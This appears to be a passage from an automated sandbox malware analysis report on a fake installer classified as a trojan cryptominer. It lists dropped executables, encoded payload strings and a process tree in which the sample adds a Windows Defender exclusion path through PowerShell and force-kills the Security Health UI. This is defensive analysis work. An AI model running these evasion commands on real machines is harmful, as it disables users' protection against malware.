      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040DB8029_2_0040DB80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00400B9029_2_00400B90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00401BA029_2_00401BA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040E3A029_2_0040E3A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004253A029_2_004253A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00447BB029_2_00447BB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040245029_2_00402450
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041545029_2_00415450
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043646029_2_00436460
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040EC7029_2_0040EC70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00423C7029_2_00423C70
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412C0029_2_00412C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00451C0029_2_00451C00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00404C1029_2_00404C10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040D41029_2_0040D410
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042341029_2_00423410
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040443029_2_00404430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040043029_2_00400430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044343029_2_00443430
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044BCC029_2_0044BCC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004484C029_2_004484C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045A4C029_2_0045A4C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F54D029_2_003F54D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00434CB029_2_00434CB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F9D3029_2_003F9D30
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042B56029_2_0042B560
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00453D6029_2_00453D60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00419D0029_2_00419D00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044FD0029_2_0044FD00
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044950029_2_00449500
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040351029_2_00403510
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042FD2029_2_0042FD20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FCD5029_2_003FCD50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040653029_2_00406530
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041353029_2_00413530
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004155C029_2_004155C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042F5D029_2_0042F5D0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00427DD029_2_00427DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042DDD929_2_0042DDD9
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00400DE029_2_00400DE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041B5F029_2_0041B5F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00437DF029_2_00437DF0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412D8029_2_00412D80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042DD8029_2_0042DD80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0047559229_2_00475592
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042C5A029_2_0042C5A0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F8DD029_2_003F8DD0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0045464029_2_00454640
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043965029_2_00439650
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00459E6029_2_00459E60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FC61029_2_003FC610
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00410E1029_2_00410E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00457E1029_2_00457E10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FDE6029_2_003FDE60
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040062029_2_00400620
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0041FE2029_2_0041FE20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004076C029_2_004076C0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042AEC029_2_0042AEC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F16B029_2_003F16B0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0042D6E029_2_0042D6E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004286E029_2_004286E0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0043AEE029_2_0043AEE0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FE69029_2_003FE690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F969029_2_003F9690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004166F029_2_004166F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00432E8029_2_00432E80
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FB6F029_2_003FB6F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044569029_2_00445690
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00433EA029_2_00433EA0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00415EB029_2_00415EB0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0040974029_2_00409740
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00411F5029_2_00411F50
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FBF1029_2_003FBF10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003FA70029_2_003FA700
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00412F1029_2_00412F10
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0047371829_2_00473718
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00403F2029_2_00403F20
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00416FC029_2_00416FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00442FC029_2_00442FC0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_004407F029_2_004407F0
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_00436F9029_2_00436F90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_0044FF9029_2_0044FF90
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 29_2_003F27E029_2_003F27E0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe 4DA98D39D64E332399A1B2EE3CBE4F07436A8B6FF9F35D41CCF0FF147F54D24C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: String function: 0045DE10 appears 96 times
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: String function: 0046607C appears 44 times
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: String function: 0046AE24 appears 34 times
      Source: New-inst-x64.exe, 00000000.00000000.1175145172.0000000003B6D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaethersuite.exe8 vs New-inst-x64.exe
      Source: New-inst-x64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: xctyuuxnvcrcuez.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992485687022901
      Source: vbczvzznbmunxtn.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
      Source: vbczvzznbmunxtn.exe.0.drStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
      Source: mbtbiqwunmmmyby.exe.0.dr, -Module-.csBase64 encoded string: 'H4sIAAAAAAAEAAuuLC5JzfXMS8svyk0t0kutSAUAxbwl3BIAAAA=', 'H4sIAAAAAAAEAEtMLsksS40vKMovSQUy8/Pii1OLyjKTU/VSK1IBBabFWx0AAAA=', 'H4sIAAAAAAAEAEuuTEot0i1OLsosKMnMS9dNrUhNLi3JL9IDMgAdHJTfHAAAAA==', 'H4sIAAAAAAAEACsoyixLLEnVTc7JL03RLSjKr6jUS61IBQDHDABaFwAAAA==', 'H4sIAAAAAAAEACvJTIrPzS/NK0ktAtJ5mSX5RXqpFakA87J1NBcAAAA=', 'H4sIAAAAAAAEAMvKT03Kr0jOzyspys/RS61IBQBs4Ht3EQAAAA==', 'H4sIAAAAAAAEACvLLU8sSi1OLSrLTE7VS61IBQC0nYUtEQAAAA==', 'H4sIAAAAAAAEANN1zs/NTcxLUVByTy3RDc/N9E/KSk0uUQjPzDM2ig/ILypxzs/LA4rkFykBAHOqT+4sAAAA', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8LcnKuKPOO8I2sKkkEABqEemIiAAAA', 'H4sIAAAAAAAEAAsJdA3x8PEq9ilPCvLwKTVPTa1yN3atTMrKDS40LXNO8yoBAAvBh9MiAAAA', 'H4sIAAAAAAAEAEvOL87NLzY0rsyryE5NTMszKcwyTy5JTaxIM6g0Mi4oTM4xyE02syw3MygxygIAB8r3yi0AAAA=', 'H4sIAAAAAAAEAEvKLEnOz8xLTizOsCosTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAmnXw3zYAAAA=', 'H4sIAAAAAAAEACssTK2sqDQpTDRLy05Pz8spKjBNL882Ls/KzjZIzy4stijNMzGpyLNMzQYAaBdagioAAAA=', 'H4sIAAAAAAAEACvKz8vMszJxsrQwMHFxNTdKcrRMSnIzNXE2NDFLTLQwTzU2tLRwNjY0NjBPNDMGABX5YPEuAAAA', 'H4sIAAAAAAAEAAsNdPJPD800zc9xLSkzKMmODPfML/T39kkKzDNzd3TJMPJIzwsqSYtPNs52SjRJ8QUAVAnaMDAAAAA=', 'H4sIAAAAAAAEACtJLSpKNMxNNc5KTy9NTq00Kk0zL7UwLkq3zM0pqEipLM3JMM+1KEm3SM4xAgCEXmR5LAAAAA==', 'H4sIAAAAAAAEAHNxL8ssdSyJKM/2y8iP8iowqgpLLQ9LyzB1KfDNKk0ODPPONUzxMU0uziwuAwCYyGRqLAAAAA==', 'H4sIAAAAAAAEADN0Ks9zDy03Ty8tyAvOdg83zTAPyHZPyQ81Lk11rzBLcQkFAI1X670iAAAA', 'H4sIAAAAAAAEADP2yQjxCy808SvKrzDPqvBNzTOziDDJ9w40sSwPN3fJdfYGAIRxX7MiAAAA', 'H4sIAAAAAAAEADOoMHGytDAwcXE1N0pytExKcjM1cTY0MUtMtDBPNTa0tHA2NjQ2ME80MwYAr82ugSoAAAA=', 'H4sIAAAAAAAEAAXB0QqDIBQA0G/Ke+u2x7FEyAqctZnv1YYQt2ws/PrOwVKm582m36ZmYbPFvfrAstrlxxdvrh1oHVXhz/aLSGsYqTFTh0zjlMER/qRAq0pzbuCB5IdoOFqX7oKOHlIpLqZfBrNfAAAA', 'H4sIAAAAAAAEAHN3cjXx83dx8gs3ijBydfEMNDczNg7xcg339A8NcDJxNzUPdPZ2jgr0DYt08zB1j4g0NQ91DQsLAwBrow6qOAAAAA==', 'H4sIAAAAAAAEAMspSTYsNDGpKjGpqjQ2y8gzKMgyyzWtSik0K8szys4qSswyzqsySSkwzSkBAKEKrqgrAAAA', 'H4sIAAAAAAAEAPNJSS8KSTZzMUzLKC+0dPMKyvJ1jcxIzHMrMq/wcw5OTAwCADl1sVwiAAAA', 'H4sIAAAAAAAEAAXBiQ3DIAwAwJVoIXU8TmSDUAErfG5g+t5dzO1VcdMEF8Tuj+eV/W1kmfEr5OjRKGlJL3kb02QEDgd0l1DOSNdTkob2xgwMMCx+2av4OElPnMXmo3bFuu4/z8o/PmcAAAA=', 'H4sIAAAAAAAEAHPxNis08UpPTLFMt/AL8fUuDfdKzC8
      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@16219/23@0/4
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile created: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exeJump to behavior
      Source: New-inst-x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;SecHealthUI.exe&quot;)
      Source: C:\Users\user\Desktop\New-inst-x64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeFile read: C:\Users\user\Desktop\New-inst-x64.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\New-inst-x64.exe "C:\Users\user\Desktop\New-inst-x64.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net session
      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 session
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
      Source: C:\Users\user\Desktop\New-inst-x64.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
